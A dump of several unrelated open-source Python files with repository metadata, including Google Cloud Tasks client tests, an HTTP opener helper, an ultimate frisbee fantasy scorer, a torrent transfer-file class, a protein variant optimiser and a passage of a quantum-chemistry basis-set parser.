) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_queue_path():
project = "squid"
location = "clam"
queue = "whelk"
expected = "projects/{project}/locations/{location}/queues/{queue}".format(
project=project, location=location, queue=queue,
)
actual = CloudTasksClient.queue_path(project, location, queue)
assert expected == actual
def test_parse_queue_path():
expected = {
"project": "octopus",
"location": "oyster",
"queue": "nudibranch",
}
path = CloudTasksClient.queue_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_queue_path(path)
assert expected == actual
def test_task_path():
project = "cuttlefish"
location = "mussel"
queue = "winkle"
task = "nautilus"
expected = "projects/{project}/locations/{location}/queues/{queue}/tasks/{task}".format(
project=project, location=location, queue=queue, task=task,
)
actual = CloudTasksClient.task_path(project, location, queue, task)
assert expected == actual
def test_parse_task_path():
expected = {
"project": "scallop",
"location": "abalone",
"queue": "squid",
"task": "clam",
}
path = CloudTasksClient.task_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_task_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "whelk"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = CloudTasksClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "octopus",
}
path = CloudTasksClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "oyster"
expected = "folders/{folder}".format(folder=folder,)
actual = CloudTasksClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nudibranch",
}
path = CloudTasksClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "cuttlefish"
expected = "organizations/{organization}".format(organization=organization,)
actual = CloudTasksClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "mussel",
}
path = CloudTasksClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "winkle"
expected = "projects/{project}".format(project=project,)
actual = CloudTasksClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "nautilus",
}
path = CloudTasksClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "scallop"
location = "abalone"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = CloudTasksClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "squid",
"location": "clam",
}
path = CloudTasksClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
transport_class = CloudTasksClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
)
with mock.patch.object(
type(getattr(client.transport, "grpc_channel")), "close"
) as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"grpc",
]
for transport in transports:
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[
(CloudTasksClient, transports.CloudTasksGrpcTransport),
(CloudTasksAsyncClient, transports.CloudTasksGrpcAsyncIOTransport),
],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
|
googleapis/python-tasks
|
tests/unit/gapic/tasks_v2beta2/test_cloud_tasks.py
|
Python
|
apache-2.0
| 219,688
|
[
"Octopus"
] |
67844a2758a5b04043be0997d28fe1ae5aa25755ef5f6806c7bc99af4b956522
|
'''OpenAnything: a kind and thoughtful library for HTTP web services
This program is part of 'Dive Into Python', a free Python book for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
This library has been slightly modified by Mike Miller, 2005.
- changed function name
- rearranged order of type checks in opn function, url not likely
- removed fetch
'''
__author__ = 'Mark Pilgrim (mark@diveintopython.org)'
__version__ = '$Revision: 1.6 $'[11:-2]
__date__ = '$Date: 2004/04/16 21:16:24 $'
__copyright__ = 'Copyright (c) 2004 Mark Pilgrim'
__license__ = 'Python'
import urllib2, urlparse, gzip
from StringIO import StringIO
USER_AGENT = 'OpenAnything/%s +http://diveintopython.org/http_web_services/' % __version__
class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_301(
self, req, fp, code, msg, headers)
result.status = code
return result
def http_error_302(self, req, fp, code, msg, headers):
result = urllib2.HTTPRedirectHandler.http_error_302(
self, req, fp, code, msg, headers)
result.status = code
return result
class DefaultErrorHandler(urllib2.HTTPDefaultErrorHandler):
def http_error_default(self, req, fp, code, msg, headers):
result = urllib2.HTTPError(
req.get_full_url(), code, msg, headers, fp)
result.status = code
return result
def opn(source, etag=None, lastmodified=None, agent=USER_AGENT):
"""URL, filename, or string --> stream
This function lets you define parsers that take any input source
(URL, pathname to local or network file, or actual data as a string)
and deal with it in a uniform manner. Returned object is guaranteed
to have all the basic stdio read methods (read, readline, readlines).
Just .close() the object when you're done with it.
If the etag argument is supplied, it will be used as the value of an
If-None-Match request header.
If the lastmodified argument is supplied, it must be a formatted
date/time string in GMT (as returned in the Last-Modified header of
a previous request). The formatted date/time will be used
as the value of an If-Modified-Since request header.
If the agent argument is supplied, it will be used as the value of a
User-Agent request header.
"""
if hasattr(source, 'read'): # already a file obj
return source
if source == '-':
return sys.stdin
# try to open with native open function (if source is a filename)
try:
return open(source)
except (IOError, OSError):
pass
# A URL is less likely so I moved it down a notch.
if urlparse.urlparse(source)[0] == 'http':
# open URL with urllib2
request = urllib2.Request(source)
request.add_header('User-Agent', agent)
if lastmodified:
request.add_header('If-Modified-Since', lastmodified)
if etag:
request.add_header('If-None-Match', etag)
request.add_header('Accept-encoding', 'gzip')
opener = urllib2.build_opener(SmartRedirectHandler(), DefaultErrorHandler())
return opener.open(request)
# treat source as string
return StringIO(str(source))
|
Recaiden/pysh
|
lib/openanything.py
|
Python
|
gpl-2.0
| 3,377
|
[
"VisIt"
] |
8b91585cf41b46028428f2da61b319edff6c4ed08f50adb68fe27149c4a7a689
|
#!/usr/bin/env python
"""
Summarize ultimate fantasy scores and results.
"""
from __future__ import print_function
import argparse
import numpy as np
import pandas as pd
from usau import markdown, reports
def compute_fantasy_picks(captain_multiplier=2, from_csv=False, fantasy_input=None):
"""Convert fantasy picks to an indicator matrix"""
# I'll wait until a next fantasy contest to see if this should be generalized ..
if from_csv:
reports.d1_college_nats_men_2016.load_from_csvs()
reports.d1_college_nats_women_2016.load_from_csvs()
fantasy_mens = reports.d1_college_nats_men_2016.rosters
fantasy_womens = reports.d1_college_nats_women_2016.rosters
fantasy_input = fantasy_input or get_fantasy_input()
for user, fantasy_lines in fantasy_input.iteritems():
fantasy_mens[user] = 0
fantasy_womens[user] = 0
for gender, fantasy_line in fantasy_lines.iteritems():
for player in fantasy_line:
player_multiplier = 1
if player.endswith("*"):
player_multiplier = captain_multiplier
player = player[:-1]
player = player.strip()
if gender == "Men":
fantasy = fantasy_mens
elif gender == "Women":
fantasy = fantasy_womens
# Try to guess name. First based on matching full name, then
# by matching on last name.
mask = fantasy.UpperName.str.contains(player.upper())
if sum(mask) == 1:
fantasy[user] += mask * player_multiplier
elif sum(mask) > 1:
print("Found multiple matching players:",
user, player, fantasy.loc[mask, "UpperName"].values)
else:
mask = fantasy.UpperName.str.contains(
player.split()[-1].upper())
if sum(mask) == 1:
fantasy[user] += mask * player_multiplier
else:
print("Found multiple or no matching players:",
user, player, fantasy.loc[mask, "UpperName"].values)
users = sorted(fantasy_input.keys(), key=lambda x: x.upper())
assert all(fantasy_mens[users].sum() == 6 + captain_multiplier)
assert all(fantasy_womens[users].sum() == 6 + captain_multiplier)
fantasy_mens["Fantasy Picks"] = fantasy_mens[users].sum(axis=1)
fantasy_womens["Fantasy Picks"] = fantasy_womens[users].sum(axis=1)
return fantasy_mens, fantasy_womens, users
def compute_athlete_fantasy_scores(df, min_players=20, goal_weight=1, assist_weight=1,
d_weight=0.2, turn_weight=-0.2):
"""Compute fantasy score
Args:
df (pd.DataFrame): Player contributions and fantasy picks
min_players (int): Minimum number of players to show, sorted by fantasy score
"""
df["Fantasy Score"] = (df.Goals * goal_weight + df.Assists * assist_weight +
df.Ds * d_weight + df.Turns * turn_weight)
# Sort players by fantasy score and mark top min_players
top_fantasy_players = np.zeros(len(df), dtype=np.bool)
top_fantasy_players[df["Fantasy Score"].argsort(
).values[::-1][:min_players]] = True
# Union of all players with non-zero fantasy picks and top min_players by fantasy score
result = (df[(df["Fantasy Picks"] > 0) | top_fantasy_players]
.sort(["Fantasy Score", "Seed"], ascending=False))
return result
def compute_fantasy_contest_results(min_players=20, use_markdown=False, display=True, from_csv=False,
fantasy_input=None, beta=0.2, captain_multiplier=2):
"""Calculate fantasy results (for athletes and contest users)
Args:
min_players (int): Minimum number of players to show
display (bool): Display results to stdout / jupyter
use_markdown (bool): Print results as a markdown-formatted table
from_csv (bool): Load data from offline csvs
"""
mens, womens, users = compute_fantasy_picks(from_csv=from_csv, captain_multiplier=captain_multiplier,
fantasy_input=fantasy_input)
# Show the top-scoring players, sorted by fantasy score
mens = compute_athlete_fantasy_scores(mens, min_players=min_players,
d_weight=beta, turn_weight=-beta)
womens = compute_athlete_fantasy_scores(womens, min_players=min_players,
d_weight=beta, turn_weight=-beta)
if display:
display_cols = ["No.", "Name", "Fantasy Score", "Position", "Height",
"Goals", "Assists", "Ds", "Turns",
"Team", "Seed", "Fantasy Picks"]
markdown.display(mens[display_cols], use_markdown=use_markdown)
markdown.display(womens[display_cols], use_markdown=use_markdown)
# Show the fantasy contest users sorted by fantasy score
results = []
for user in users:
results.append({"User": user,
"Men's": sum(mens["Fantasy Score"] * mens[user]),
"Women's": sum(womens["Fantasy Score"] * womens[user])})
results = pd.DataFrame(results)
results["Total"] = results["Men's"] + results["Women's"]
results = results.sort("Total", ascending=False)[
["User", "Total", "Men's", "Women's"]]
if display:
markdown.display(results, use_markdown=use_markdown)
return results
def get_fantasy_input():
"""Mapping of users to fantasy lines, with captain marked by asterisk.
Each fantasy line should have exactly 7 players, one of which is marked captain.
This probably should be offloaded to some configuration file.
"""
return {
"scottyskin96": {
"Men": ["Dalton Smith", "John Stubbs*", "Xavier Maxstadt", "Ben Jagt", "Joe Marmerstein", "Khalif", "Trent Dillon"],
"Women": ["Shofner*", "Kaylor", "Wahlroos", "Marisa Rafter", "Claire revere", "Mira Donaldson", "Han Chen"],
},
"chubs45": {
"Men": ["Ben Jagt*", "Jack Williams", "John Stubbs", "Connor Kline", "Max Thorne", "Dalton Smith", "Jeff Babbitt"],
"Women": ["Jesse Shofner*", "Marisa Rafter", "Han Chen", "Mira Donaldson", "Janina Freystaetter", "Jacyln Verzuh", "Kirstin Johnson"],
},
"duthracht": {
"Men": ["John Stubbs", "Aaron Speiss", "Khalif El-Salaam", "Dalton Smith", "Ben Jagt", "Xavier Maxstadt*", "Jack Williams"],
"Women": ["Marisa Rafter", "Jesse Shofner*", "Han Chen", "Mira Donaldson", "Kristin Pojunis", "Janina Freystaetter", "Angela Zhu"],
},
"giftedbadly": {
"Men": ["Dalton Smith*", "Tannor Johnson", "Trent Dillon", "Pat Earles", "Jack Williams", "John Stubbs", "Jeff Babbitt"],
"Women": ["Mira Donaldson*", "Jesse Shofner", "Janina Freystaetter", "Claire Revere", "Marisa Rafter", "Angela Zhu", "Kristen Pojunis"],
},
"krdonnie": {
"Men": ["John Stubbs", "Pat Earles", "Mark Vandenberg*", "Sam Little", "Dalton Smith", "Connor Holcombe", "Ben Jagt"],
"Women": ["Carolyn Normile", "Shayna Brock", "Jesse Shofner*", "Mira Donaldson", "Han Chen", "Chloe Rowse", "Janina Freystaetter"],
},
"Ultimatezach": {
"Men": ["Dalton Smith*", "Ben Jagt", "Xavier Maxstadt", "Khalif El-Salaam", "Trent Dillon", "John Stubbs", "Tannor Johnson"],
"Women": ["Jesse Shofner*", "Mira Donaldson", "Marisa Rafter", "Kristin Pojunis", "Janina Freystaetter", "Kirstin Johnson", "Bethany Kaylor"],
},
"dlquinonesII": {
"Men": ["Ben Jagt", "John Stubbs", "Dalton Smith*", "Conor Kline", "Xavier Maxstadt", "Khalif El-Salaam", "Trent Dillon"],
"Women": ["Mira Donaldson", "Janina Freystaetter", "Shayna Brock", "Claire Revere", "Jesse Shofner*", "Han Chen", "Carolyn Normile"],
},
"ultimatefrisbee": {
"Men": ["Dalton Smith", "Xavier Maxstadt", "Ben Jagt", "Khalif El-Salaam*", "Mark Vandenberg", "John Stubbs", "Ryan Landry"],
"Women": ["Mira Donaldson*", "Olivia Bartruff", "Jesse Shofner", "Monisha White", "Jaclyn Verzuh", "Claire Revere", "Kristen Pojunis"],
},
"livetweetyourgames": {
"Men": ["Tannor Johnson*", "Conor Kline", "Connor Matthews", "Connor Holcombe", "Max Thorne", "Ben Jagt", "Dalton Smith"],
"Women": ["Janina Freystaetter*", "Shayna Brock", "Mira Donaldson", "Kate Scarth", "Olivia Bartruff", "Jesse Shofner", "Courtney Gegg"],
},
"anti_spiral": {
"Men": ["Dalton Smith*", "Pat Earles", "Tannor Johnson", "Connor Matthews", "Jack Williams", "Jeff Babbitt", "John Stubbs"],
"Women": ["Kate Scarth", "Bethany Kaylor", "Courtney Gegg*", "Hayley Wahlroos", "Abbie Abramovich", "Mira Donaldson", "Alexa Wood"],
},
"grhgra002": {
"Men": ["Dalton Smith*", "John Stubbs", "Mark Vandenberg", "Xavier Maxstadt", "Ben Jagt", "Khalif El-Salaam", "Connor Matthews"],
"Women": ["Jesse Shofner*", "Marisa Rafter", "Mira Donaldson", "Han Chen", "Kristin Pojunis", "Courtney Gegg", "Claire Revere"],
},
"samth": {
"Women": ["Shofner*", "Kaylor", "Verzuh", "Donaldson", "Wahlroos", "Brock", "Freystaetter"],
"Men": ["Trent Dillon", "Maxstadt", "Kline", "Babbit*", "Sadok", "Jagt", "Stubbs"],
},
"almondchipcookies": {
"Men": ["Jeff Babbit*", "Connor Matthews", "Adam Rees", "Ryan Osgar", "Pat Earles", "Dalton Smith", "John Stubbs"],
"Women": ["Beth Kaylor*", "Jesse Shofner", "Mira Donaldson", "Monisha White", "Shayna Brock", "Han Chen", "Angela Zhu"],
},
"azjps": {
"Men": ["Jeffrey Babbitt*", "Ryan Osgar", "Connor Matthews", "Dalton Smith", "Conor Kline", "Jack Williams", "Mark Vandenberg"],
"Women": ["Kate Scarth*", "Angela Zhu", "Bethany Kaylor", "Stephanie Williams", "Jesse Shofner", "Courtney Gegg", "Olivia Bartruff"],
}
}
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_players", type=int, default=20,
help="Minimum number of top scorers")
parser.add_argument("--markdown", action="store_true",
help="Output as markdown")
parser.add_argument("--csv", action="store_true",
help="Load data from offline csvs")
args = parser.parse_args()
with pd.option_context("display.width", 1000,
"display.max_rows", 100,
"display.max_columns", 100,
"display.max_colwidth", 100):
compute_fantasy_contest_results(num_players=args.num_players,
use_markdown=args.markdown,
from_csv=args.csv)
|
azjps/usau-py
|
usau/fantasy.py
|
Python
|
mit
| 11,294
|
[
"Dalton"
] |
e496e894d078bb7f014a05bfa625d62f3bcb23daa6f693fb7bb06496fbce66bf
|
################################################################################
# $Id$
# $Date$
# $Revision$
################################################################################
# #
# LICENSE #
# #
# This program is free software; you can redistribute it and/or #
# modify it under the terms of the GNU General Public License (GPL) #
# as published by the Free Software Foundation; either version 2 #
# of the License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# To read the license please visit http://www.gnu.org/copyleft/gpl.html #
# #
# #
################################################################################
# standard-imports
import os
# fluazu
from fluazu.output import printError
################################################################################
""" ------------------------------------------------------------------------ """
""" TransferFile """
""" ------------------------------------------------------------------------ """
class TransferFile(object):
""" -------------------------------------------------------------------- """
""" __init__ """
""" -------------------------------------------------------------------- """
def __init__(self, file):
# file
self.file = file
# fields
self.transferowner = ""
self.savepath = ""
self.max_upload_rate = ""
self.max_download_rate = ""
self.max_uploads = ""
self.superseeder = ""
self.die_when_done = ""
self.sharekill = ""
self.minport = ""
self.maxport = ""
self.maxcons = ""
self.rerequest = ""
# init
if self.file is not '':
self.initialize(self.file)
""" -------------------------------------------------------------------- """
""" initialize """
""" -------------------------------------------------------------------- """
def initialize(self, file):
# file
self.file = file
# read in transfer-file + set fields
if os.path.isfile(self.file):
try:
# read file to mem
f = open(self.file, 'r')
data = f.read()
f.close()
# set fields
content = data.split("\n")
if len(content) > 11:
self.transferowner = content[0]
self.savepath = content[1]
self.max_upload_rate = content[2]
self.max_download_rate = content[3]
self.max_uploads = content[4]
self.superseeder = content[5]
self.die_when_done = content[6]
self.sharekill = content[7]
self.minport = content[8]
self.maxport = content[9]
self.maxcons = content[10]
self.rerequest = content[11]
return True
else:
printError("Failed to parse transfer-file %s " % self.file)
except:
printError("Failed to read transfer-file %s " % self.file)
return False
""" -------------------------------------------------------------------- """
""" write """
""" -------------------------------------------------------------------- """
def write(self):
# write transfer-file
try:
f = open(self.file, 'w')
f.write(str(self.transferowner) + '\n')
f.write(str(self.savepath) + '\n')
f.write(str(self.max_upload_rate) + '\n')
f.write(str(self.max_download_rate) + '\n')
f.write(str(self.max_uploads) + '\n')
f.write(str(self.superseeder) + '\n')
f.write(str(self.die_when_done) + '\n')
f.write(str(self.sharekill) + '\n')
f.write(str(self.minport) + '\n')
f.write(str(self.maxport) + '\n')
f.write(str(self.maxcons) + '\n')
f.write(str(self.rerequest))
f.flush()
f.close()
return True
except:
printError("Failed to write transfer-file %s " % self.file)
return False
|
epsylon3/torrentflux
|
html/bin/clients/fluazu/fluazu/TransferFile.py
|
Python
|
gpl-2.0
| 5,394
|
[
"VisIt"
] |
b5aa9a48f4d7c4a9548675504be5c68a5e307c15b7005b1ccdc78b65bd0f80a3
|
'''
PathwayGenie (c) GeneGenie Bioinformatics Ltd. 2018
PathwayGenie is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
# pylint: disable=too-few-public-methods
import sys
from Bio.Alphabet import generic_dna
from Bio.Seq import Seq
from synbiochem.utils import dna_utils, seq_utils
from synbiochem.utils.ice_utils import ICEClientFactory
class ProssOptimiser():
'''Class to optimise designs based on PROSS output.'''
def __init__(self, ice_parms, taxonomy_id,
group_names=None):
self.__ice_client_factory = ICEClientFactory()
self.__ice_client = \
self.__ice_client_factory.get_ice_client(ice_parms[0],
ice_parms[1],
ice_parms[2],
group_names=group_names)
self.__cod_opt = seq_utils.CodonOptimiser(taxonomy_id)
def close(self):
'''Close.'''
self.__ice_client_factory.close()
def generate_variants(self, template_ice_id, variants_aas):
'''Generate variants.'''
for variants_aa_name, variant_aa_seq in variants_aas.items():
# Generate new variant ICEEntry:
ice_entry = self.__ice_client.get_ice_entry(template_ice_id)
_, cds_feat, cds_aa_seq = _get_cds_feat(ice_entry)
var_ice_entry = ice_entry.copy()
var_ice_entry.get_metadata()['name'] = variants_aa_name
# Add stop-codon if missing:
if cds_aa_seq[-1] == '*' and variant_aa_seq[-1] != '*':
variant_aa_seq = variant_aa_seq + '*'
var_seq = self.__mutate(ice_entry.get_seq(),
cds_feat['start'],
cds_aa_seq,
variant_aa_seq)
var_ice_entry.get_dna().set_seq(var_seq)
self.__ice_client.set_ice_entry(var_ice_entry)
assert _translate(var_ice_entry) == variant_aa_seq
def __mutate(self, template_nucl_seq, cds_start, cds_aa_seq,
variant_aa_seq):
'''Perform mutation.'''
var_seq = template_nucl_seq
for pos, pair in enumerate(zip(cds_aa_seq, variant_aa_seq)):
if pair[0] != pair[1]:
codon_start = (cds_start - 1) + pos * 3
var_seq = \
var_seq[:codon_start] + \
self.__cod_opt.get_best_codon(pair[1]) + \
var_seq[codon_start + 3:]
return var_seq
def _get_cds_feat(ice_entry):
'''Get CDS feature from entry.'''
# Get index and CDS feature:
resp = [[idx, feat]
for idx, feat in enumerate(ice_entry.get_dna()['features'])
if feat['typ'] == dna_utils.SO_CDS]
assert len(resp) == 1
nucl_seq = ice_entry.get_seq()
cds_nucl_seq = nucl_seq[resp[0][1]['start'] - 1:resp[0][1]['end']]
cds_aa_seq = str(Seq(cds_nucl_seq, generic_dna).translate())
return resp[0][0], resp[0][1], cds_aa_seq
def _translate(var_ice_entry):
'''Return translation.'''
return str(Seq(var_ice_entry.get_dna()['seq']).translate())[5:]
def main(args):
'''main method.'''
optimiser = ProssOptimiser([args[0], args[1], args[2]], args[4], args[6:])
optimiser.generate_variants(args[3], seq_utils.read_fasta(args[5]))
optimiser.close()
if __name__ == '__main__':
main(sys.argv[1:])
|
neilswainston/PathwayGenie
|
scripts/pross.py
|
Python
|
mit
| 3,559
|
[
"VisIt"
] |
f4b91a264e6367bc7d7cc782e944ef57e79db749be7649adebb4bb8d52274362
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import re
import sys
from .exceptions import *
from .libmintsgshell import *
if sys.version_info >= (3,0):
basestring = str
class Gaussian94BasisSetParser(object):
"""Class for parsing basis sets from a text file in Gaussian 94
format. Translated directly from the Psi4 libmints class written
by Justin M. Turney and Andrew C. Simmonett.
"""
def __init__(self, forced_puream=None):
"""Constructor"""
# If the parser needs to force spherical or cartesian (e.g., loading old guess)
self.force_puream_or_cartesian = False if forced_puream is None else True
# Is the forced value to use puream? (Otherwise force Cartesian).
self.forced_is_puream = False if forced_puream is None else forced_puream
# string filename
self.filename = None
def load_file(self, filename, basisname=None):
"""Load and return the file to be used by parse. Return only
portion of *filename* pertaining to *basisname* if specified (for
multi-basisset files) otherwise entire file as list of strings.
"""
# string filename
self.filename = filename
given_basisname = False if basisname is None else True
found_basisname = False
basis_separator = re.compile(r'^\s*\[\s*(.*?)\s*\]\s*$')
# Loads an entire file.
try:
infile = open(filename, 'r')
except IOError:
raise BasisSetFileNotFound("""BasisSetParser::parse: Unable to open basis set file: %s""" % (filename))
if os.stat(filename).st_size == 0:
raise ValidationError("""BasisSetParser::parse: given filename '%s' is blank.""" % (filename))
contents = infile.readlines()
lines = []
for text in contents:
text = text.strip()
# If no basisname was given always save the line.
if given_basisname is False:
lines.append(text)
if found_basisname:
# If we find another [*] we're done.
if basis_separator.match(text):
what = basis_separator.match(text).group(1)
break
lines.append(text)
continue
# If the user gave a basisname AND text matches the basisname we want to trigger to retain
if given_basisname and basis_separator.match(text):
if basisname == basis_separator.match(text).group(1):
found_basisname = True
return lines
def parse(self, symbol, dataset):
"""Given a string, parse for the basis set needed for atom.
* @param symbol atom symbol to look for in dataset
* @param dataset data set to look through
dataset can be list of lines or a single string which will be converted to list of lines
"""
if isinstance(dataset, basestring):
lines = dataset.split('\n')
else:
lines = dataset
# Regular expressions that we'll be checking for.
cartesian = re.compile(r'^\s*cartesian\s*', re.IGNORECASE)
spherical = re.compile(r'^\s*spherical\s*', re.IGNORECASE)
comment = re.compile(r'^\s*\!.*') # line starts with !
separator = re.compile(r'^\s*\*\*\*\*') # line starts with ****
ATOM = '(([A-Z]{1,3}\d*)|([A-Z]{1,3}_\w+))' # match 'C 0', 'Al c 0', 'P p88 p_pass 0' not 'Ofail 0', 'h99_text 0'
atom_array = re.compile(r'^\s*((' + ATOM + '\s+)+)0\s*$', re.IGNORECASE) # array of atomic symbols terminated by 0
atom_ecp = re.compile(r'^\s*((' + ATOM + '-ECP\s+)+)(\d+)\s+(\d+)\s*$', re.IGNORECASE) # atom_ECP number number
shell = re.compile(r'^\s*(\w+)\s*(\d+)\s*(-?\d+\.\d+)') # Match beginning of contraction
blank = re.compile(r'^\s*$')
NUMBER = r'((?:[-+]?\d*\.\d+(?:[DdEe][-+]?\d+)?)|(?:[-+]?\d+\.\d*(?:[DdEe][-+]?\d+)?)|(?:[-+]?\d+))'
primitives1 = re.compile(r'^\s*' + NUMBER + '\s+' + NUMBER + '.*') # Match s, p, d, f, g, ... functions
primitives2 = re.compile(r'^\s*' + NUMBER + '\s+' + NUMBER + '\s+' + NUMBER + '.*') # match sp functions
ecpinfo = re.compile(r'^\s*(\d)\s+' + NUMBER + '\s+' + NUMBER + '.*') # Match rpower, exponent, coefficient
# s, p and s, p, d can be grouped together in Pople-style basis sets
sp = 'SP'
spd = 'SPD'
# a b c d e f g h i j k l m n o p q r s t u v w x y z
#shell_to_am = [-1,-1,-1, 2,-1, 3, 4, 5, 6,-1, 7, 8, 9,10,11, 1,12,13, 0,14,15,16,17,18,19,20]
alpha = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
angmo = [-1, -1, -1, 2, -1, 3, 4, 5, 6, -1, 7, 8,
9, 10, 11, 1, 12, 13, 0, 14, 15, 16, 17, 18, 19, 20]
shell_to_am = dict(zip(alpha, angmo))
# Basis type.
gaussian_type = 'Pure'
if self.force_puream_or_cartesian:
if self.forced_is_puream == False:
gaussian_type = 'Cartesian'
# Need a dummy center for the shell.
center = [0.0, 0.0, 0.0]
shell_list = []
ecp_shell_list = []
lineno = 0
ncore = 0
ecp_msg = None
basis_found = False
while lineno < len(lines):
line = lines[lineno]
lineno += 1
# Ignore blank lines
if blank.match(line):
continue
# Look for Cartesian or Spherical
if not self.force_puream_or_cartesian:
if cartesian.match(line):
gaussian_type = 'Cartesian'
#TODO if psi4.get_global_option('PUREAM').has_changed():
#TODO gaussian_type = 'Pure' if int(psi4.get_global('PUREAM')) else 'Cartesian'
continue
elif spherical.match(line):
gaussian_type = 'Pure'
#TODO if psi4.get_global_option('PUREAM').has_changed():
#TODO gaussian_type = 'Pure' if int(psi4.get_global('PUREAM')) else 'Cartesian'
continue
#end case where puream setting wasn't forced by caller
# Do some matches
if comment.match(line):
continue
if separator.match(line):
continue
# Match: H 0
# or: H O... 0
if atom_array.match(line):
what = atom_array.match(line).group(1).split()
if symbol in [x.upper() for x in what]:
# Read in the next line
line = lines[lineno]
lineno += 1
# Match: H_ECP 0
# or: H_ECP O_ECP ... 0
if atom_ecp.match(line):
ecp_msg = """line %5d""" % (lineno)
symbol_to_am = {0: 0, 's': 0, 'S': 0,
1: 1, 'p': 1, 'P': 1,
2: 2, 'd': 2, 'D': 2,
3: 3, 'f': 3, 'F': 3,
4: 4, 'g': 4, 'G': 4}
# This is an ECP spec like "KR-ECP 3 28"
matchobj = atom_ecp.match(line)
sl = line.split()
maxam = int(sl[-2])
ncore = int(sl[-1])
# This parser is not tolerant of comments of blank lines. Perhaps the best strategy is to
# remove all comments/blank lines first before getting in here. This'll do for now.
